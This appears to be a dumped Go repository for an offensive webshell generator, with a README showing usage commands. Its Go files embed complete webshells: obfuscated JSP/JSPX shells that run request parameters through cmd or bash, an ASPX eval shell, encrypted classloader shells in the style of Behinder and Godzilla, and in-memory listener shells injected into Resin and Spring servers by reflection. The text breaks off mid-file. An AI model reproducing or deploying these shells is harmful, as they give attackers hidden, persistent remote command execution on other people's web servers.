├── go.mod ├── code ├── ucoide.go ├── readme.txt ├── unkown.go ├── Md5.go └── unicode.go ├── .gitattributes ├── common ├── Parse.go ├── file.go ├── randstr.go ├── config.go └── flag.go ├── main.go ├── shell ├── php.go ├── Behinder │ └── jspshell.go ├── plugin.go ├── java.go ├── Godzilla │ └── jspshell.go ├── memory │ ├── Behinder │ │ ├── BeResin │ │ │ ├── BeRase128.go │ │ │ └── BeRxor.go │ │ ├── Bespring │ │ │ ├── Behsaes128.go │ │ │ └── Behxor.go │ │ └── Betomcat │ │ │ ├── Bettaes128.go │ │ │ └── Bettxor.go │ └── Godzilla │ │ ├── GoResin │ │ └── GoResin128.go │ │ ├── GoSpring │ │ └── GoSpring128.go │ │ └── JDK │ │ └── HttpServlet.go └── bypass │ └── bypassphp.go └── README.md /go.mod: -------------------------------------------------------------------------------- 1 | module webshell 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /code/ucoide.go: -------------------------------------------------------------------------------- 1 | package code 2 | 3 | func Uncoide() { 4 | //后续开发 5 | } 6 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /code/readme.txt: -------------------------------------------------------------------------------- 1 | 此目录文件用于普通的php和jsp加密 2 | 3 | This directory file is used for normal php and jsp encryption -------------------------------------------------------------------------------- /code/unkown.go: -------------------------------------------------------------------------------- 1 | package code 2 | 3 | func Base64() { 4 | //fmt.Println(common.Webshells, shell.Aaaa) 5 | //后续开发 6 | } 7 | -------------------------------------------------------------------------------- /common/Parse.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import "os" 4 | 5 | func Parse1() { 6 | Paseshell() 7 | } 8 | 9 | func Paseshell() { 10 | if Webshell == " " && Password == " " { 11 | os.Exit(0) 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /common/file.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "os" 5 | ) 6 | 7 | func File() { 8 | r, _ := os.OpenFile(Filename, os.O_CREATE, 0644) 9 | defer func() { r.Close() }() 10 | _, err := r.WriteString(Webshells) 11 | if err != nil { 12 | return 13 | } 14 | 15 | } 16 | -------------------------------------------------------------------------------- /code/Md5.go: -------------------------------------------------------------------------------- 1 | package code 2 | 3 | import ( 4 | "crypto/md5" 5 | "fmt" 6 | "webshell/common" 7 | ) 8 | 9 | func Md5(a string) string { 10 | b := md5.Sum([]byte(common.Password)) // 加密数据 11 | //fmt.Printf("%x",b) // 转换为16进制,并打印 12 | a = fmt.Sprintf("%x", b) 13 | return a 14 | } 15 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "time" 6 | "webshell/common" 7 | "webshell/shell" 8 | ) 9 | 10 | func main() { 11 | start := time.Now() 12 | shell.Exec() 13 | end := time.Now().Sub(start) 14 | fmt.Println("[*]FileName:", common.Filename, "\n[*]Password:", common.Password, "\n[*]生成耗时:", end) 15 | } 16 | -------------------------------------------------------------------------------- /shell/php.go: -------------------------------------------------------------------------------- 1 | package shell 2 | 3 | import ( 4 | "webshell/common" 5 | ) 6 | 7 | //哥斯拉 8 | 9 | //冰蝎 10 | 11 | //bypass 12 | 13 | func Php() { 14 | common.Filename = common.RandStr(10) + `.php` 15 | common.Webshells = `` 16 | } 17 | -------------------------------------------------------------------------------- /common/randstr.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "math/rand" 5 | "time" 6 | ) 7 | 8 | func RandStr(length int) string { 9 | str := "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 10 | bytes := []byte(str) 11 | result := []byte{} 12 | rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100))) 13 | for i := 0; i < length; i++ { 14 | result = append(result, bytes[rand.Intn(len(bytes))]) 15 | } 16 | return string(result) 17 | } 18 | 19 | -------------------------------------------------------------------------------- /common/config.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | var ( 4 | i int 5 | Php string 6 | Webshell string 7 | Password string 8 | Help bool 9 | Pass string 10 | shellphp string 11 | php string 12 | jsp string 13 | jspx string 14 | asp string 15 | aspx string 16 | Filename string 17 | Webshells string 18 | Encode string 19 | Javaweb string 20 | titles string 21 | ) 22 | 23 | var ( 24 | tomcat string 25 | spring string 26 | resin string 27 | jdk string 28 | Memory string 29 | Bypass string 30 | Lei string 31 | ) 32 | -------------------------------------------------------------------------------- /code/unicode.go: -------------------------------------------------------------------------------- 1 | package code 2 | 3 | import ( 4 | "fmt" 5 | "strconv" 6 | "unicode" 7 | ) 8 | 9 | func Unicode(str string) string { 10 | DD := []rune(str) //需要分割的字符串内容,将它转为字符,然后取长度。 11 | finallStr := "" 12 | for i := 0; i < len(DD); i++ { 13 | if unicode.Is(unicode.Scripts["Han"], DD[i]) { 14 | textQuoted := strconv.QuoteToASCII(string(DD[i])) 15 | finallStr += textQuoted[1 : len(textQuoted)-1] 16 | } else { 17 | h := fmt.Sprintf("%x", DD[i]) 18 | finallStr += "\\uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu" + isFullFour(h) 19 | } 20 | } 21 | return finallStr 22 | } 23 | 24 | func isFullFour(str string) string { 25 | if len(str) == 1 { 26 | str = "000" + str 27 | } else if len(str) == 2 { 28 | str = "00" + str 29 | } else if len(str) == 3 { 30 | str = "0" + str 31 | } 32 | return str 33 | } 34 | -------------------------------------------------------------------------------- /shell/Behinder/jspshell.go: -------------------------------------------------------------------------------- 1 | package Behinder 2 | 3 | import "webshell/common" 4 | 5 | func Jspshell() { 6 | common.Filename = common.RandStr(5) 7 | common.Webshells = `<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*" %> 8 | <%! 9 | private byte[] Decrypt(byte[] data) throws Exception 10 | { 11 | String key="e45e329feb5d925b"; //md5[0:16] 12 | for (int i = 0; i < data.length; i++) { 13 | data[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15])); 14 | } 15 | return data; 16 | } 17 | %> 18 | <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return 19 | super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){ 20 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 21 | byte[] buf = new byte[512]; 22 | int length=request.getInputStream().read(buf); 23 | while (length>0) 24 | { 25 | byte[] data= Arrays.copyOfRange(buf,0,length); 26 | bos.write(data); 27 | length=request.getInputStream().read(buf); 28 | } 29 | out.clear(); 30 | out=pageContext.pushBody(); 31 | new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);} 32 | %>` 33 | } 34 | -------------------------------------------------------------------------------- /common/flag.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "os" 7 | "runtime" 8 | "runtime/debug" 9 | "time" 10 | ) 11 | 12 | func init() { 13 | go func() { 14 | for { 15 | GC() 16 | time.Sleep(5 * time.Second) 17 | } 18 | }() 19 | } 20 | 21 | func GC() { 22 | runtime.GC() 23 | debug.FreeOSMemory() 24 | } 25 | 26 | func title() { 27 | titles = ` 28 | 29 | _ _ _ _ 30 | __ _____| |__ ___| |__ ___| | | 31 | \ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | | 32 | \ V V / __/ |_) \__ \ | | | __/ | | 33 | \_/\_/ \___|_.__/|___/_| |_|\___|_|_| 34 | version 1.1 35 | -p password | Default password noway 36 | -s php | jsp | asp | aspx 37 | -e xor | aes 38 | -d be | god 39 | ` 40 | fmt.Println(titles) 41 | } 42 | 43 | func Flag() { 44 | title() 45 | flag.StringVar(&Webshell, "s", "", "-s php | jsp | asp | aspx") 46 | flag.StringVar(&Password, "p", " ", "-p password") 47 | flag.BoolVar(&Help, "h", false, "help") 48 | flag.StringVar(&Encode, "e", "", " unicode:such as -d be -e unicode |xor aes 128 only Behinder and Godzilla") 49 | flag.StringVar(&Memory, "d", "", "-d Behinder(Be) | Godzilla(God) ") 50 | flag.StringVar(&Bypass, "b", "", "something bypass waf | php ") 51 | flag.StringVar(&Lei, "l", "", "-l spring tomcat resin jdk") 52 | flag.Parse() 53 | if Help { 54 | flag.PrintDefaults() 55 | os.Exit(0) 56 | } 57 | return 58 | } 59 | -------------------------------------------------------------------------------- /shell/plugin.go: -------------------------------------------------------------------------------- 1 | package shell 2 | 3 | import ( 4 | "webshell/common" 5 | "webshell/shell/Godzilla" 6 | "webshell/shell/bypass" 7 | "webshell/shell/memory/Behinder/BeResin" 8 | "webshell/shell/memory/Behinder/Bespring" 9 | "webshell/shell/memory/Behinder/Betomcat" 10 | "webshell/shell/memory/Godzilla/GoResin" 11 | "webshell/shell/memory/Godzilla/GoSpring" 12 | "webshell/shell/memory/Godzilla/Gotomcat" 13 | "webshell/shell/memory/Godzilla/JDK" 14 | ) 15 | 16 | func Exec() { 17 | common.Flag() 18 | Common() 19 | Bypass() 20 | Meme() 21 | common.File() 22 | } 23 | 24 | func Common() { 25 | if common.Password == " " { 26 | common.Password = common.RandStr(5) 27 | } 28 | if common.Webshell != " " { 29 | switch common.Webshell { 30 | case "php": 31 | Php() 32 | case "asp": 33 | Asp() 34 | case "jsp": 35 | Jsp() 36 | case "aspx": 37 | Aspx() 38 | case "jspx": 39 | Jspx() 40 | } 41 | } 42 | } 43 | 44 | func Meme() { 45 | if common.Memory == "be" && common.Encode == "xor" && common.Lei != "" { 46 | switch common.Lei { 47 | case "spring": 48 | Bespring.Behxor() 49 | case "tomcat": 50 | Betomcat.TomXorbL() 51 | case "resin": 52 | BeResin.BeRxor() 53 | } 54 | } 55 | if common.Memory == "Be" && common.Encode == "aes" && common.Lei != "" { 56 | switch common.Lei { 57 | case "spring": 58 | Bespring.BeS128() 59 | case "tomcat": 60 | Betomcat.TomactLis() 61 | case "resin": 62 | BeResin.BeRase128() 63 | } 64 | } 65 | if common.Memory == "God" && common.Encode == "aes" && common.Lei != " " { 66 | switch common.Lei { 67 | case "spring": 68 | GoSpring.GoSpringInterceptor() 69 | case "tomcat": 70 | Gotomcat.GoTomcatServlet() 71 | case "resin": 72 | GoResin.GoResin128() 73 | case "jdk": 74 | JDK.HttpServlet() 75 | } 76 | } 77 | } 78 | 79 | func Bypass() { 80 | if common.Bypass != " " { 81 | switch common.Bypass { 82 | case "php": 83 | bypass.Phpbypass() 84 | } 85 | } 86 | if common.Memory == "be" && common.Encode == "unicode" { 87 | Godzilla.Jspun() 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 1.2: 2 | 3 | ``` 4 | 1:Unicode编码,目前只支持哥斯拉jsp编码 5 | 2:当未指定密码时,将生成随机的密码,随机的文件名 6 | ``` 7 | 8 | ![img](https://pic.certbug.com/i/2023/02/28/xqtkxd.webp) 9 | 10 | 11 | 12 | 1.1: 13 | 14 | ``` 15 | 16 | _ _ _ _ 17 | __ _____| |__ ___| |__ ___| | | 18 | \ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | | 19 | \ V V / __/ |_) \__ \ | | | __/ | | 20 | \_/\_/ \___|_.__/|___/_| |_|\___|_|_| 21 | vsersion 1.1 22 | -p password | Default password noway 23 | -s php | jsp | asp | aspx 24 | -e xor | aes 25 | -d be | god 26 | 27 | -b string 28 | something bypass waf | php 29 | -d string 30 | -d Behinder(Be) | Godzilla(God) 31 | -e string 32 | xor aes 128 only Behinder and Godzilla 33 | -h help 34 | -l string 35 | -l spring tomacat resin jdk 36 | -p string 37 | -p password (default "noway") 38 | -s string 39 | -s php | jsp | asp | aspx 40 | 41 | ``` 42 | 43 | There are some tips you can get : 44 | 45 | ``` 46 | Generate memory shell 47 | Usage of God 48 | tomcat: 49 | .\webshell.exe -d God -e aes -l tomcat 50 | spring: 51 | .\webshell.exe -d God -e aes -l spring 52 | resin: 53 | .\webshell.exe -d God -e aes -l resin 54 | jdk: 55 | .\webshell.exe -d God -e aes -l jdk 56 | 57 | 58 | Usage of Be (xor aes) 59 | tomcat: 60 | .\webshell.exe -d be -e xor -l tomcat 61 | spring: 62 | .\webshell.exe -d be -e xor -l spring 63 | resin: 64 | .\webshell.exe -d be -e xor -l resin 65 | 66 | ``` 67 | 68 | what is more you need to konw is that Godzilla only has aes code 69 | 70 | About the bypass option, only generation is currently supported And only php>7.0 is supported 71 | 72 | ``` 73 | The following is general usage 74 | .\webshell.exe -s php -p 666 75 | ``` 76 | 77 | ![img](https://pic.certbug.com/i/2023/02/28/xqtbhl.webp) 78 | 79 | ![img](https://pic.certbug.com/i/2023/02/28/xqtwzh.webp) 80 | 81 | End:Update every two months 82 | 83 | 84 | 85 | 86 | 87 | -------------------------------------------------------------------------------- /shell/java.go: -------------------------------------------------------------------------------- 1 | package shell 2 | 3 | import "webshell/common" 4 | 5 | func Jsp() { 6 | common.Filename = "xxxxxkka.jsp" 7 | common.Webshells = `<% String AY85C = request.getParameter("` + common.Password + `");ProcessBuilder pb;if(String.valueOf(java.io.File.separatorChar).equals("\\")){pb = new ProcessBuilder(new /*ZU9HS9ML28*/String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), AY85C);}else{pb = new ProcessBuilder/*ZU9HS9ML28*/(new/*ZU9HS9ML28*/String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), AY85C);}if (AY85C != null) {Process process = pb.start();java.util.Scanner EB7vGQh7 = new java.util.Scanner(process.getInputStream()).useDelimiter("\\A");String op="";op = EB7vGQh7.hasNext() ? EB7vGQh7.next() : op;EB7vGQh7.close();out.print(op);}else {response.sendError(404);} %>` 8 | } 9 | 10 | func Jspx() { 11 | common.Filename = "xxxxkkka.jspx" 12 | common.Webshells = ` 13 | 14 | 

15 | String Af8uW = request.getParameter("` + common.Password + `");ProcessBuilder pb;if(String.valueOf(java.io.File.separatorChar).equals("\\")){pb = new ProcessBuilder(new /*Z24pg1a5rQ*/String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), Af8uW);}else{pb = new ProcessBuilder/*Z24pg1a5rQ*/(new/*Z24pg1a5rQ*/String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), Af8uW);}if (Af8uW != null) {Process process = pb.start();java.util.Scanner E683BD82 = new java.util.Scanner(process.getInputStream()).useDelimiter("\\A");String op="";op = E683BD82.hasNext() ? E683BD82.next() : op;E683BD82.close();out.print(op);}else {response.sendError(404);}
16 |
` 17 | } 18 | 19 | func Asp() { 20 | common.Filename = "xxxxkkka.aspx" 21 | common.Webshells = `<% 22 | 32 | %>` 33 | } 34 | 35 | func Aspx() { 36 | common.Filename = "xxxxkkka.asp" 37 | common.Webshells = `<% function Ekj04pi9(){var GEPH="unsa",YACK="fe",CCi7=GEPH+YACK;return CCi7;}var PAY:String=Request["` + common.Password + `"];~eval/*ZlA9h2RV68*/(PAY,Ekj04pi9());%><%@Page Language=JS%>` 38 | } 39 | -------------------------------------------------------------------------------- /shell/Godzilla/jspshell.go: -------------------------------------------------------------------------------- 1 | package Godzilla 2 | 3 | import ( 4 | "webshell/code" 5 | "webshell/common" 6 | ) 7 | 8 | func Jspshell() { 9 | common.Filename = common.RandStr(5) + `.jsp` 10 | common.Webshells = `<%! String xc="` + code.Md5(common.Password)[0:16] + `"; 11 | String pass="` + common.Password + `"; 12 | String md5=md5(pass+xc); 13 | class X extends ClassLoader { 14 | public X(ClassLoader z) { 15 | super(z); 16 | } 17 | 18 | public Class Q(byte[] cb) { 19 | return super.defineClass(cb, 0, cb.length); 20 | } 21 | } 22 | public byte[] x(byte[] s,boolean m) { 23 | try { 24 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); 25 | c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); 26 | return c.doFinal(s); 27 | } catch (Exception e) { 28 | return null; 29 | } 30 | } 31 | public static String md5(String s) { 32 | String ret = null;try { 33 | java.security.MessageDigest m; 34 | m = java.security.MessageDigest.getInstance("MD5"); 35 | m.update(s.getBytes(), 0, s.length()); 36 | ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 37 | } 38 | catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception { 39 | Class base64;String value = null;try { 40 | base64 = Class.forName("java.util.Base64"); 41 | Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null); 42 | value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs}); 43 | } 44 | catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){ 45 | } 46 | %>` 47 | } 48 | 49 | func Jspxshell() { 50 | common.Filename = common.RandStr(5) + `.jspx` 51 | common.Webshells = ` 52 | 53 | String xc = "` + code.Md5(common.Password)[0:16] + `"; 54 | String pass = "` + common.Password + `; 55 | String md5 = md5(pass + xc); 56 | 57 | class X extends ClassLoader { 58 | public X(ClassLoader z) { 59 | super(z); 60 | } 61 | 62 | public Class Q(byte[] cb) { 63 | return super.defineClass(cb, 0, cb.length); 64 | } 65 | } 66 | 67 | public byte[] x(byte[] s, boolean m) { 68 | try { 69 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); 70 | c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); 71 | return c.doFinal(s); 72 | } catch (Exception e) { 73 | return null; 74 | } 75 | } 76 | 77 | public static String md5(String s) { 78 | String ret = null; 79 | try { 80 | java.security.MessageDigest m; 81 | m = java.security.MessageDigest.getInstance("MD5"); 82 | m.update(s.getBytes(), 0, s.length()); 83 | ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 84 | } catch (Exception e) { 85 | } 86 | return ret; 87 | } 88 | 89 | public static String base64Encode(byte[] bs) throws Exception { 90 | Class base64; 91 | String value = null; 92 | try { 93 | base64 = Class.forName("java.util.Base64"); 94 | Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null); 95 | value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs}); 96 | } catch (Exception e) { 97 | try { 98 | base64 = Class.forName("sun.misc.BASE64Encoder"); 99 | Object Encoder = base64.newInstance(); 100 | value = (String) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs}); 101 | } catch (Exception e2) { 102 | } 103 | } 104 | return value; 105 | } 106 | 107 | public static byte[] base64Decode(String bs) throws Exception { 108 | Class base64; 109 | byte[] value = null; 110 | try { 111 | base64 = Class.forName("java.util.Base64"); 112 | Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); 113 | value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); 114 | } catch (Exception e) { 115 | try { 116 | base64 = Class.forName("sun.misc.BASE64Decoder"); 117 | Object decoder = base64.newInstance(); 118 | value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); 119 | } catch (Exception e2) { 120 | } 121 | } 122 | return value; 123 | } 124 | 125 | 126 | try { 127 | byte[] data = base64Decode(request.getParameter(pass)); 128 | data = x(data, false); 129 | if (session.getAttribute("payload") == null) { 130 | session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data)); 131 | } else { 132 | request.setAttribute("parameters", data); 133 | java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); 134 | Object f = ((Class) session.getAttribute("payload")).newInstance(); 135 | f.equals(arrOut); 136 | f.equals(pageContext); 137 | response.getWriter().write(md5.substring(0, 16)); 138 | f.toString(); 139 | response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); 140 | response.getWriter().write(md5.substring(16)); 141 | } 142 | } catch (Exception e) { 143 | } 144 | 145 | ` 146 | } 147 | -------------------------------------------------------------------------------- /shell/memory/Behinder/BeResin/BeRase128.go: -------------------------------------------------------------------------------- 1 | package BeResin 2 | 3 | import "webshell/common" 4 | 5 | func BeRase128() { 6 | common.Filename = "ResinListener.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class ResinListener implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i listeners = 232 | (ArrayList) getFieldValue(webApp, "_requestListeners"); 233 | for (Object listener: listeners) { 234 | if (listener instanceof Proxy) { 235 | return; 236 | } 237 | } 238 | Class WebApp = webApp.getClass(); 239 | if (WebApp.getName() == "com.caucho.server.webapp.Application") { 240 | WebApp = WebApp.getSuperclass(); 241 | } 242 | Method addListenerObject = getMethodX( 243 | WebApp, "addListenerObject", 2 244 | ); 245 | addListenerObject.setAccessible(true); 246 | addListenerObject.invoke(webApp, proxyObject, true); 247 | } 248 | 249 | public ResinListener() { 250 | synchronized(lock) { 251 | Class servletRequestListener = null; 252 | try { 253 | servletRequestListener = Class.forName( 254 | "javax.servlet.ServletRequestListener" 255 | ); 256 | } catch (ClassNotFoundException e) {} 257 | 258 | if (servletRequestListener != null) { 259 | Object proxyObject = Proxy.newProxyInstance( 260 | getLoader(), new Class[]{servletRequestListener}, this 261 | ); 262 | try { 263 | addListener(proxyObject); 264 | } catch (Exception e) {} 265 | } 266 | } 267 | } 268 | 269 | static { 270 | new ResinListener(); 271 | } 272 | } 273 | ` 274 | } 275 | -------------------------------------------------------------------------------- /shell/memory/Behinder/BeResin/BeRxor.go: -------------------------------------------------------------------------------- 1 | package BeResin 2 | 3 | import "webshell/common" 4 | 5 | func BeRxor() { 6 | common.Filename = "ResinListener.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class ResinListener implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i listeners = 234 | (ArrayList) getFieldValue(webApp, "_requestListeners"); 235 | for (Object listener: listeners) { 236 | if (listener instanceof Proxy) { 237 | return; 238 | } 239 | } 240 | Class WebApp = webApp.getClass(); 241 | if (WebApp.getName() == "com.caucho.server.webapp.Application") { 242 | WebApp = WebApp.getSuperclass(); 243 | } 244 | Method addListenerObject = getMethodX( 245 | WebApp, "addListenerObject", 2 246 | ); 247 | addListenerObject.setAccessible(true); 248 | addListenerObject.invoke(webApp, proxyObject, true); 249 | } 250 | 251 | public ResinListener() { 252 | synchronized(lock) { 253 | Class servletRequestListener = null; 254 | try { 255 | servletRequestListener = Class.forName( 256 | "javax.servlet.ServletRequestListener" 257 | ); 258 | } catch (ClassNotFoundException e) {} 259 | 260 | if (servletRequestListener != null) { 261 | Object proxyObject = Proxy.newProxyInstance( 262 | getLoader(), new Class[]{servletRequestListener}, this 263 | ); 264 | try { 265 | addListener(proxyObject); 266 | } catch (Exception e) {} 267 | } 268 | } 269 | } 270 | 271 | static { 272 | new ResinListener(); 273 | } 274 | } 275 | ` 276 | } 277 | -------------------------------------------------------------------------------- /shell/memory/Behinder/Bespring/Behsaes128.go: -------------------------------------------------------------------------------- 1 | package Bespring 2 | 3 | import "webshell/common" 4 | 5 | func BeS128() { 6 | common.Filename = "SpringInterceptor.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class SpringInterceptor implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 